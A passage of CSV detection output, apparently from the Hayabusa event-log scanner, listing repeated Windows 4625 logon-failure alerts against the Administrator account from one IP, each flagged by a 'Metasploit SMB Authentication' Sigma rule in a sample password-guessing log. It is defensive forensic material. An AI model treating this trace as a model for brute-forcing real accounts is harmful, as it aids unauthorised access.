Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FEirUFRscaOwTuAg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:13.965 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RwQgMM9H1oN4te9Z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JbGILYTcFwtYbDk1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.056 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: p5KzNsgWvyUhNEHd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.168 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KGvwbOtP3A5eDKCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.213 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YZvtNNX511hIleST : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.261 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lJBRTeW6OQtNrt5u : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.299 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Hovgq99STVt2GzrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.348 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4kpT3gf0VCAVuVSa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.380 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tiB04AvkYp0PP3n1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.428 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PPluKgaiT10oC35V : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.479 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8nCOM9uUeqv9QBx6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dSPrrNCh2FSWZKbI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.574 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aLDnCjr4pSdKAMX7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.621 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: G0UnmfB7lcXKEAvn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.673 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ogjMSxcUw7cF5dMa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.722 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 75uB8ejsSV5CbagM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.773 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5MMHLnyrzBQxluHn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.814 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5QXLn6fpmR52RBAz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.862 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KcdlrSUzcFNpaK5v : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.908 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VJjiRO5rJzZ8XtqP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.944 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ncBraDdG2htkHjXU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:14.986 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Lo9DNrL44Z2S2SYR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.033 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QKcFiKC5QiIoHtxy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sqvq9GwuPCO15lUV : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4XzgtJ3qUmkFiIY5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.164 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: V1wc1Hjb4AK0Np1q : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.215 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PKYNy0JyxIlFusMC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.253 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IrcKp13ut9M0pCi0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.298 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B3lJSH0r8iHAVhPF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.341 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ju3lCbvbwvkIKsBo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.392 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dQOHcZeAKQG6wHhC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.435 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QBPkgoKDLABqdSQb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.474 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wqj4xOCsJg1j3IIh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.524 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhBIu6wUPHc3DZAy : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.561 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: W0fI1GhH5YTOHbNN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7mLOWiojillZNYH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.652 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37dknpwsl8j1WRWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.702 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gzVum7a21sQe3fMt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.748 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JCFPSQmywelTXg74 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.788 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCqb6TVV14hVX3NY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.832 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 3qJsJrxVARedOdd3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.888 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s7iNkrkBNEbXPK0B : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.936 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Bio4zciNRolyeHc1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:15.975 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IFf1vN5MgAIsdZvx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.026 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zWhgUQSWAycVdYoS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.072 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ugHUJZuKHYfUHXWS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:16.116 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB 